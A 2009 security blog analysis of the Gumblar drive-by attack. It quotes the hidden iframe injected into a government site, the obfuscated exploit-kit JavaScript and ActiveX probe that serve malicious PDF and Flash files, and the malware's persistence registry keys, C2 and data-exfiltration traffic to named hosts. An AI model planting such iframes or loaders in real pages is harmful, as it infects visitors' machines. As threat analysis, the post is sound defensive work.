Thursday, June 11, 2009

Gumblar Analysis

So it seems Gumblar is the latest threat to receive continual media hype. It was nice to see Symantec's opinion that this is just another day in the life of the web. Recent "threats" like Conficker and Gumblar seem to benefit security vendors and consultants who feed the hype for business purposes. The term Gumblar is an adopted term that describes a recent web-based drive-by attack. The attack follows the standard web-based drive-by attack TTP:

  1. The bad guys use stolen FTP credentials or SQL injection to inject iframe redirects into legitimate websites.
  2. The iframes redirect to sites that host exploit code targteted against web browsers, browser plug-ins and 3rd party applications (IE, FF, Adobe Reader, WinZip, etc.)
  3. The exploits result in malware payload. The malware typically downloads additional for-profit malware (spambots, infostealers, rogue security products, etc.)
  4. Credentials exfiltrated by infostealers (like FTP) are used to compromise additional web servers back in step #1.
At one point in the attack (~May 2009), the Gumblar exploit site was gumblar.cn (hence the adopted name). The domain martuz.cn was later used. The activity began much further back, but the attack summary was put togther and publicized more recently. The following "Gumblar" analysis goes back to April 17, 2009 before gumbar.cn was utilized.

Gumbar Exploit Analysis

The USDA Forest Service website (http://www.fs.fed.us) was a vicitm of an iframe injection. The compromised site contained an iframe to lotmachinesguide.cn (94.247.3.150, Latvia).

<iframe src="http://lotmachinesguide.cn/in.cgi?income56" width=1 height=1 style="visibility: hidden"></iframe>

The lotmachinesguide.cn/in.cgi?income56 request returned a HTTP Location redirect to liteautogreatest.cn (94.247.3.151, Latvia). The http://liteautogreatest.cn/index.php request returned obfuscated JavaScript and references to Adobe Reader and Flash files that contain exploit code.

http://liteautogreatest.cn/cache/readme.pdf
http://liteautogreatest.cn/cache/flash.swf

The first 2 sections of exploit code target the Microsoft Access Snapshot Viewer ActiveX Control Vulnerability (CVE-2008-2463, MS08-041). The readme.pdf file contains code designed to exploit the Adobe util.printf overflow vulnerability (CVE-2008-2992, APSB08-19) and a vulnerability in the JavaScript method Collab.collectEmailInfo() in Adobe PDF Reader’s JavaScript Engine (CVE-2007-5659, APSB08-13). The flash.swf file exploits an Adobe Flash vulnerability (not sure specific one).The exploit payloads were GET requests to litehitscar.cn (94.247.3.151, Latvia) that returned load.exe.

http://litehitscar.cn/load.php?id=1
http://litehitscar.cn/load.php?id=4
http://litehitscar.cn/load.php?id=5

http://liteautogreatest.cn/index.php Code

<script>eval(function(l,a,z,k,e,d){e=function(z){return(z<a?'':e(parseInt(z/a)))+((z=z%a)>35?String.fromCharCode(z+29):z.toString(36))};while(z--){if(k[z]){l=l.replace(new RegExp('\\b'+e(z)+'\\b','g'),k[z])}}return l}('1h(1i(\'%E%J%l%o%h%k%p%l%0%V%l%E%10%h%L%B%E%w%1%2%d%c%I%d%c%g%E%p%9%1%j%P%D%9%11%j%M%P%w%0%t%0%15%F%0%z%q%s%A%A%G%w%D%H%0%t%0%x%x%u%0%j%P%D%9%11%j%M%P%w%0%1g%t%0%15%13%u%0%j%P%D%9%11%j%M%P%w%y%y%2%d%c%g%I%d%c%g%g%z%q%s%A%A%G%w%D%H%0%t%0%X%h%9%k%l%s%r%E%9%p%O%B%q%i%9%B%p%C%8%1%13%A%0%y%0%j%P%D%9%11%j%M%P%w%2%u%d%c%g%g%z%i%9%0%C%H%w%B%12%G%q%C%Z%0%t%0%l%8%L%0%19%O%i%s%8%1%2%u%d%c%g%g%C%H%w%B%12%G%q%C%Z%r%v%9%o%0%t%0%x%9%8%v%W%n%n%x%0%y%0%z%q%s%A%A%G%w%D%H%0%y%0%x%W%6%6%x%0%y%0%f%R%a%7%1%2%9%1%e%p%2%e%s%5%9%1%a%i%7%O%e%4%0%2%10%b%k%4%m%e%a%2%8%1%v%b%e%e%f%r%9%8%j%m%i%o%8%1%n%5%3%a%3%b%3%6%4%3%6%7%3%6%2%3%6%e%3%6%1%n%k%s%F%0%f%f%2%0%y%0%x%6%6%x%0%y%0%f%D%7%J%1%4%a%h%e%7%m%2%1%a%p%1%p%a%a%a%Y%a%2%0%7%5%a%1c%a%1%5%4%V%4%a%j%7%4%9%4%5%8%a%1%v%2%7%v%5%4%f%r%9%8%j%m%i%o%8%1%n%a%3%b%3%5%3%6%7%3%6%1%3%6%4%3%6%e%3%6%2%n%k%s%F%0%f%f%2%0%y%0%x%6%6%x%0%y%0%f%O%5%2%v%e%p%2%8%a%7%1%9%1%8%2%e%4%v%5%b%7%5%r%2%b%b%b%C%b%5%4%b%m%4%e%5%m%1%4%f%r%9%8%j%m%i%o%8%1%n%b%3%6%4%3%6%e%3%6%1%3%a%3%6%2%3%5%3%6%7%n%k%s%F%0%f%f%2%0%y%0%x%n%b%15%n%17%x%u%d%c%d%c%g%g%k%E%1%C%H%w%B%12%G%q%C%Z%r%q%8%k%s%q%h%0%t%t%0%A%1m%2%d%c%g%g%I%d%c%g%g%g%14%9%8%i%Y%u%d%c%g%g%K%d%c%d%c%g%g%C%H%w%B%12%G%q%C%Z%0%t%0%f%f%u%d%c%g%K%d%c%d%c%g%9%8%h%J%9%l%0%z%q%s%A%A%G%w%D%H%u%d%c%K%d%c%d%c%E%J%l%o%h%k%p%l%0%m%9%o%1a%O%M%N%1b%k%1%J%9%m%2%d%c%I%d%c%g%z%i%9%0%z%q%s%A%A%G%w%D%H%0%t%0%V%l%E%10%h%L%B%E%w%1%2%u%d%c%g%k%E%0%1%z%q%s%A%A%G%w%D%H%0%t%t%0%f%1f%f%2%0%9%8%h%J%9%l%u%d%c%d%c%g%h%9%M%d%c%g%I%d%c%g%g%z%i%9%0%j%N%B%U%T%S%Q%l%0%t%0%l%8%L%0%18%o%h%k%z%8%Z%D%14%1d%8%o%h%1%f%v%e%5%l%1%e%a%j%a%z%4%1%L%7%b%a%7%r%e%5%5%a%X%4%5%7%7%l%5%5%7%2%i%4%1%e%j%7%a%5%b%7%v%b%b%7%q%2%b%p%a%7%4%h%4%2%0%5%2%1l%7%1%4%5%k%4%a%8%5%5%L%7%8%a%4%7%9%1%4%1%7%0%a%7%e%2%B%4%a%p%2%l%7%b%4%e%h%4%b%9%7%5%4%p%4%m%5%2%4%r%5%b%7%5%17%a%b%2%f%r%9%8%j%m%i%o%8%1%n%b%3%6%e%3%6%2%3%6%4%3%6%1%3%5%3%6%7%3%a%n%k%s%F%0%f%f%2%2%u%d%c%g%K%d%c%d%c%g%o%i%h%o%q%1%8%2%d%c%g%I%d%c%g%g%k%E%0%1%j%N%B%U%T%S%Q%l%0%4%t%0%f%1f%4%1%p%5%1%14%e%1%1d%5%5%8%2%5%2%o%b%h%4%7%5%1k%5%b%e%f%r%9%8%j%m%i%o%8%1%n%6%7%3%a%3%6%e%3%6%2%3%6%4%3%b%3%6%1%3%5%n%k%s%F%0%f%f%2%2%0%9%8%h%J%9%l%u%d%c%g%K%d%c%d%c%g%j%N%B%U%T%S%Q%l%r%X%l%i%j%v%q%p%h%R%i%h%q%0%t%0%J%9%m%u%d%c%d%c%g%h%9%M%d%c%g%I%d%c%g%g%j%N%B%U%T%S%Q%l%r%B%p%O%j%9%8%v%v%8%C%R%i%h%q%0%t%0%z%q%s%A%A%G%w%D%H%0%y%0%x%W%6%6%x%0%y%0%f%R%4%2%e%9%4%e%5%p%4%a%1%5%s%a%1%9%7%a%i%4%e%O%2%2%0%2%4%5%10%4%k%e%1%m%2%1%8%b%b%a%v%2%1%2%f%r%9%8%j%m%i%o%8%1%n%b%3%6%2%3%a%3%6%e%3%6%1%3%6%7%3%5%3%6%4%n%k%s%F%0%f%f%2%0%y%0%x%6%6%x%0%y%0%f%D%2%b%J%4%h%5%5%7%m%4%e%p%2%b%p%4%Y%5%e%2%0%5%1c%a%V%b%j%1%4%7%9%7%8%5%5%v%7%b%v%e%4%a%f%r%9%8%j%m%i%o%8%1%n%6%4%3%b%3%5%3%6%e%3%6%2%3%a%3%6%1%3%6%7%n%k%s%F%0%f%f%2%0%y%0%x%6%6%x%0%y%0%f%L%e%7%i%2%1%14%4%7%r%4%5%8%7%a%e%1%V%b%a%8%2%4%f%r%9%8%j%m%i%o%8%1%n%6%7%3%6%e%3%5%3%b%3%6%4%3%a%3%6%1%3%6%2%n%k%s%F%0%f%f%2%u%d%c%g%g%j%N%B%U%T%S%Q%l%r%R%9%k%l%h%X%l%i%j%v%q%p%h%1%2%u%d%c%g%K%d%c%d%c%g%o%i%h%o%q%1%8%2%I%K%u%d%c%d%c%g%z%i%9%0%8%Y%Q%R%z%k%m%13%18%1e%0%t%0%v%8%h%19%l%h%8%9%z%i%m%1%E%J%l%o%h%k%p%l%1%2%I%k%E%0%1%j%N%B%U%T%S%Q%l%r%9%8%i%C%M%X%h%i%h%8%0%t%t%0%w%2%0%I%o%m%8%i%9%19%l%h%8%9%z%i%m%1%8%Y%Q%R%z%k%m%13%18%1e%2%u%L%k%l%C%p%L%r%m%p%o%i%h%k%p%l%0%t%0%f%m%1%C%b%i%1%1%1%1%j%1%W%b%4%2%n%a%7%1%a%a%n%2%7%a%4%f%r%9%8%j%m%i%o%8%1%n%6%7%3%6%e%3%6%1%3%6%2%3%a%3%b%3%5%3%6%4%n%k%s%F%0%f%f%2%u%K%K%F%0%1j%16%16%16%2%u%d%c%K%d%c%d%c%m%9%o%1a%O%M%N%1b%k%1%f%q%b%2%h%2%5%a%5%h%b%j%4%W%e%7%e%n%2%e%2%n%1%e%m%a%7%k%1%h%4%b%8%7%q%1%k%2%2%h%2%5%v%5%1%o%2%5%4%b%4%i%5%9%7%1%7%r%b%o%1%7%1%l%e%1%n%4%4%m%b%e%p%7%b%7%i%b%7%4%4%e%C%b%r%7%7%j%4%5%4%q%1%b%j%2%a%b%5%2%1n%5%2%1%5%k%e%e%7%C%2%b%a%t%5%17%4%1%f%r%9%8%j%m%i%o%8%1%n%6%7%3%6%1%3%a%3%b%3%6%2%3%6%4%3%5%3%6%e%n%k%s%F%0%f%f%2%2%u\'));',62,86,'u0020|u0028|u0029|u007c|u0021|u0026|u005c|u005e|u0065|u0072|u0040|u0023|u000a|u000d|u0024|u0027|u0009|u0074|u0061|u0070|u0069|u006e|u006c|u002f|u0063|u006f|u0068|u002e|u0067|u003d|u003b|u0073|u0034|u0022|u002b|u0076|u0035|u0043|u0064|u004f|u0066|u002c|u0052|u0051|u007b|u0075|u007d|u0077|u0079|u004a|u006d|u0048|u004e|u0050|u004c|u0042|u0059|u0078|u003a|u0053|u006b|u0058|u0046|u004b|u0057|u0036|u0062|u0032|u0030|u0031|u0041|u0049|u0037|u0044|u0045|u006a|u0055|u005b|u003c|eval|unescape|u0033|u005d|u0056|u0039|u003f'.split('|')))</script><html>

<body>
<script>
function pdfswf()
{
.PDF = new Array("AcroPDF.PDF", "PDF.PdfCtrl");
.for(i in PDF)
.{
..try
..{
...obj = new ActiveXObject(PDF[i]);
...if (obj)
...{
....document.write('<iframe src="cache/readme.pdf"></iframe>');
...}
..}
..catch(e){}
.}
.try
.{
..obj = new ActiveXObject("ShockwaveFlash.ShockwaveFlash");
..if (obj)
..{
...document.write('<iframe src="cache/flash.swf"></iframe>');
..}
.}
.catch(e){}
}
pdfswf();
</script>



Malware Analysis

http://litehitscar.cn/load.php?id=5 (load.exe)

The request for load.php returns the binary file load.exe.

File: load.exe
Size: 18432
MD5: 4C328C15F6E8603F713FDACF7DAC6E87

The malware dropper load.exe creates C:\WINDOWS\system32\digiwet.dll and modifies a registry key to launch the malware at startup.

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders "SecurityProviders"
Old type: REG_SZ
New type: REG_SZ
Old data: msapsspc.dll, schannel.dll, digest.dll, msnsspc.dll
New data: msapsspc.dll, schannel.dll, digest.dll, msnsspc.dll, digiwet.dll

The digiwet.dll malware is the core “Gumblar” bot. The malware initiates connections to the bot controller at 78.109.29.112 (Ukraine) and downloads 259043 bytes of data which includes additional malware. Additional C2 connections to 78.109.30.224 (Ukraine) were observed.

GET /new/controller.php?action=bot&entity_list=&uid=1&first=1&guid=3970894049&rnd=981633 HTTP/1.1
Host: 78.109.29.112

HTTP/1.1 200 OK
Server: nginx
Date: Fri, 17 Apr 2009 00:06:05 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
Version: 1
Content-Length: 259043
Entity-Info: 1239013921:32768:1;1239013932:41984:1;1239013964:84480:2;1239022982:33792:2;1239024633:45568:2;1239875139:20451:2;

Rnd: 982306

Magic-Number: 256|1|40:21:222:188:141:149:35:113:122:238:96:131:88:202:90:82:137:127:146:127:209:5:235:94:57:25:53:42:127:239:54:168:4:21:100:145:170:136:3:37:118:100:168:206:47:2:33:184:129:179:55:83:185:35:177:242:60:231:29:188:214:84:100:218:105:201:108:19:81:112:57:199:212:225:150:3:228:183:188:102:107:243:186:36:23:108:23:83:83:52:16:41:136:116:4:241:62:112:5:143:225:62:87:182:32:238:186:5:166:118:107:17:106:38:54:129:146:77:213:229:129:229:14:10:90:19:251:152:132:1:40:101:64:128:27:97:111:213:102:21:75:210:39:181:248:93:55:138:170:12:112:44:242:127:54:77:146:50:229:22:51:14:123:115:143:151:213:254:108:59:20:184:14:59:110:6:152:165:145:67:178:1:111:164:128:165:241:19:215:215:41:11:230:164:126:117:60:84:116:168:143:136:97:157:195:207:164:92:117:54:159:39:55:14:204:184:180:189:203:139:149:245:150:124:154:21:241:214:105:102:127:249:238:224:151:178:176:59:14:37:113:173:77:169:187:25:98:112:215:46:251:108:35:146:233:189:

eON...#q~.`..5ZR1......^y.5*..6...d....%vd../.!...7S.#..

************************************************************************

GET /new/controller.php?action=report&guid=0&rnd=981633&uid=1&entity=1239013921:unique_start;1239013932:unique_start;1239013964:unique_start;1239022982:unique_start;1239024633:unique_start;1239875139:unique_start HTTP/1.1
Host: 78.109.29.112


************************************************************************

POST /good/receiver/online HTTP/1.1
Host: 78.109.30.224
Content-Type: application/x-www-form-urlencoded
Content-Length: 16

guid=397089404

************************************************************************

The downloaded data creates 4 temp files:

C:\WINDOWS\Temp\wpv451239013964.exe
C:\WINDOWS\Temp\wpv211239022982.exe
C:\WINDOWS\Temp\wpv781239024633.exe
C:\WINDOWS\Temp\wpv941239875139.exe

wpv451239013964.exe (Downloader)
The Temp file wpv451239013964.exe creates a trojan downloader. The malware creates:

C:\WINDOWS\system32\crypts.dll

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\crypt "Asynchronous"
Type: REG_DWORD
Data: 01, 00, 00, 00
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\crypt "DLLName"
Type: REG_SZ
Data: crypts.dll
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\crypt "Impersonate"
Type: REG_DWORD
Data: 01, 00, 00, 00
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\crypt "StartShell"
Type: REG_SZ
Data: Run

The malware connects to af9f440dcc.com (83.133.127.5, Germany) to receive instructions for additional malware downloads. The below connection returns instructions to download malware from spaeioer.com (68.180.151.74, US)

GET /bt.php?mod=&id=computername_-324073247&up=2667859&mid=soboc43 HTTP/1.1
Accept: */*
UA-CPU: x86
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)
Host: af9f440dcc.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Transfer-Encoding: chunked
X-Powered-By: PHP/5.2.6
Content-type: text/html
Date: Fri, 17 Apr 2009 00:42:08 GMT
Server: lighttpd/1.4.19


0SLP:3600;MOD:dAjvlbv5;URL:http://spaeioer.com/741l3.exe;SRV:stoped;

************************************************************************

GET /741l3.exe HTTP/1.1
Accept: */*
UA-CPU: x86
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)
Host: spaeioer.com
Connection: Keep-Alive


************************************************************************

wpv211239022982.exe (Gozi)
The Temp file wpv211239022982.exe creates a Gozi variant. The malware monitors web connections and serves as an infostealer. The Temp file wpv211239022982.exe creates:

C:\WINDOWS\9129837.exe

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
ttool = "%Windir%\9129837.exe"

The file 9129837.exe creates:

C:\WINDOWS\new_drv.sys

HKEY_CURRENT_USER\Software\Microsoft\InetData "Data"
Type: REG_BINARY
Data: 28, 00, 00, 00, 00, A5, 01, DB, 00, 00, F1, 0C, 65, 30
HKEY_CURRENT_USER\Software\Microsoft\InetData "k1"
Type: REG_DWORD
Data: 15, AB, 0A, 85
HKEY_CURRENT_USER\Software\Microsoft\InetData "k2"
Type: REG_DWORD
Data: 91, CC, B1, 44
HKEY_CURRENT_USER\Software\Microsoft\InetData "version"
Type: REG_SZ
Data: 16


HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\new_drv "DisplayName"
Type: REG_SZ
Data: !!!!
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\new_drv "ErrorControl"
Type: REG_DWORD
Data: 00, 00, 00, 00
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\new_drv "ImagePath"
Type: REG_EXPAND_SZ
Data: \??\C:\WINDOWS\new_drv.sys
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\new_drv "Start"
Type: REG_DWORD
Data: 03, 00, 00, 00
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\new_drv "Type"
Type: REG_DWORD
Data: 01, 00, 00, 00
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\new_drv\Enum "0"
Type: REG_SZ
Data: Root\LEGACY_NEW_DRV\0000
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\new_drv\Enum "Count"
Type: REG_DWORD
Data: 01, 00, 00, 00
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\new_drv\Enum "NextInstance"
Type: REG_DWORD
Data: 01, 00, 00, 00
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\new_drv\Security "Security"
Type: REG_BINARY
Data: [binary data]

The following services are stopped:

Application Layer Gateway Service
Windows Firewall/Internet Connection Sharing (ICS)
Security Center

The Gozi malware connects to 91.207.61.44 (Ukraine) and 212.117.165.54 (Luxembourg) for C2 and data exfiltration.

POST /cgi-bin/ppp.cgi HTTP/1.1
Content-Type: multipart/form-data; boundary=--------------------------28c6e728c6e728c6e7
User-Agent: IE
Host: 91.207.61.44
Content-Length: 231
Cache-Control: no-cache


----------------------------28c6e728c6e728c6e7

Content-Disposition: form-data; name="upload_file"; filename="2232068885.16"
Content-Type: application/octet-stream
Forms:

----------------------------28c6e728c6e728c6e7--


************************************************************************

GET /cgi-bin/commm.cgi?user_id=2232068885&version_id=16&passphrase=fkjvhsdvlksdhvlsd&socks=2149&version=125&crc=00000000 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)
Host: 91.207.61.44


************************************************************************

GET /cgi-bin/ooo.cgi?user_id=2232068885&version_id=16&passphrase=fkjvhsdvlksdhvlsd&socks=2149&version=125&crc=00000000 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)
Host: 91.207.61.44


************************************************************************

POST /cgi-bin/ccc.cgi HTTP/1.1
Content-Type: multipart/form-data; boundary=--------------------------28cd6f28cd6f28cd6f
User-Agent: IE
Host: 91.207.61.44
Content-Length: 305
Cache-Control: no-cache

----------------------------28cd6f28cd6f28cd6f

Content-Disposition: form-data; name="upload_file"; filename="2232068885.16"
Content-Type: application/octet-stream


0S...0...*.H.. .......0.0;0.0...+........z(W...g*{....5&.............*...Z...18m.....

----------------------------28cd6f28cd6f28cd6f—


************************************************************************

POST /cgi-bin/fd.cgi HTTP/1.1
Content-Type: multipart/form-data; boundary=--------------------------28ea2e28ea2e28ea2e
User-Agent: IE
Host: 91.207.61.44
Content-Length: 263
Cache-Control: no-cache


----------------------------28ea2e28ea2e28ea2e
Content-Disposition: form-data; name="upload_file"; filename="2232068885.16"
Content-Type: application/octet-stream

URL: https://212.117.165.54/put.php

load=1
----------------------------28ea2e28ea2e28ea2e--

************************************************************************

POST /cgi-bin/fd.cgi HTTP/1.1
Content-Type: multipart/form-data; boundary=--------------------------297799297799297799
User-Agent: IE
Host: 91.207.61.44
Content-Length: 3494
Cache-Control: no-cache


----------------------------297799297799297799

Content-Disposition: form-data; name="upload_file"; filename="2232068885.16"

Content-Type: application/octet-stream

URL: https://212.117.165.54/put.php

type=jpg&img=/9j/4AAQSkZJRgABAQEAYABgAAD/2wBDAAgGBgcGBQgHBwcJCQgKDBQNDAsLDBkSEw8UHRofHh0aHBwgJC4nICIsIxwcKDcpLDAxNDQ0Hyc5PTgyPC4zNDL/2wBDAQkJCQwLDBgNDRgyIRwhMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjL/wAARCAAwANoDASIAAhEBAxEB/8QAHwAAAQUBAQEBAQEAAAAAAAAAAAECAwQFBgcICQoL/8QAtRAAAgEDAwIEAwUFBAQAAAF9AQIDAAQRBRIhMUEGE1FhByJxFDKBkaEII0KxwRVS0fAkM2JyggkKFhcYGRolJicoKSo0NTY3ODk6Q0RFRkdISUpTVFVWV1hZWmNkZWZnaGlqc3R1dnd4eXqDhIWGh4iJipKTlJWWl5iZmqKjpKWmp6ipqrKztLW2t7i5usLDxMXGx8jJytLT1NXW19jZ2uHi4+Tl5ufo6erx8vP09fb

************************************************************************

POST /cgi-bin/fd.cgi HTTP/1.1
Content-Type: multipart/form-data; boundary=--------------------------2a3ea22a3ea22a3ea2
User-Agent: IE
Host: 91.207.61.44
Content-Length: 266
Cache-Control: no-cache

----------------------------2a3ea22a3ea22a3ea2

Content-Disposition: form-data; name="upload_file"; filename="2232068885.16"
Content-Type: application/octet-stream


URL: https://212.117.165.54/put.php

confirm=1

----------------------------2a3ea22a3ea22a3ea2—

************************************************************************

wpv781239024633.exe (Zefarch)
The Temp file wpv781239024633.exe creates a Trojan. Zefarch variant. The malware monitors connections to various search engines and redirects search results to adware and malicious websites. The Temp file wpv781239024633.exe creates:

C:\WINDOWS\psbdxt.dll

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Rzuwewi "Wjite"
Type: REG_BINARY
Data: 43, 01, 38, 03, 58, 05, 51, 07, 41, 09, 44, 0B, 48, 0D, 41, 0F, 47, 11, 41, 13, 48, 15, 66, 17, 6B, 19, 78, 1B, 78, 1D, 66, 1F, 54, 21, 0C, 23, 40, 25, 4A, 27, 44, 29, 2A, 2B
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Rzuwewi "Xlaheko"
Type: REG_SZ
Data: 61

wpv941239875139.exe (Pushdo)
The Temp file wpv941239875139.exe creates a Pushdo/Pandex/Cutwail variant. The malware serves as a spambot. The Temp file wpv941239875139.exe creates a file in the user profile directory with the same name as the actual profile name. In this example john.exe was created.

Creates:
C:\Documents and Settings\John\John.exe

A registry key is created to launch the malware at startup

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run "John"
Type: REG_SZ
Data: C:\Documents and Settings\John\John.exe /i
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run "John"
Type: REG_SZ
Data: C:\Documents and Settings\John\John.exe /i

The malware connected to 94.247.2.95 (Latvia) for C2.

GET /40E8001430303030303030303030303030303030303031306C0000009666000000007600000642EB00053059707A82 HTTP/1.0
Content-Type: application/octet-stream


Filename Size MD5
741l3.exe 72704 03aaccd01330f844d6c601df997fc1ff
9129837.exe 33792 096ffe693647f1ad8b2e86a8b7f05b44
crypts.dll 33280 1e6d7d0dcb2afcbf20b676f0992057bb
digiwet.dll 18432 3a1d598473469887fd0ed651b7ca96b8
flash.swf 16588 609d207cf010cbda0fcde027301cbd0e
John.exe 20451 eda1b7d3cdb3fb1a1c4e4ba2b51b46a7
load.exe 18432 4c328c15f6e8603f713fdacf7dac6e87
new_drv.sys 8192 a54de1d46ff7bdefbf9d9284c1916c5e
psbdxt.dll 45568 e075c7258f38b6581277552db80659f3
readme.pdf 15964 3e8da97b9f4da49498dfa31ae1c5c342
wpv451239013964.exe 84480 29d9286c42074702a96d94138a092450
wpv781239024633.exe 45568 27a9a6570b53d3dc1e9a24317f6f6fa6

No comments: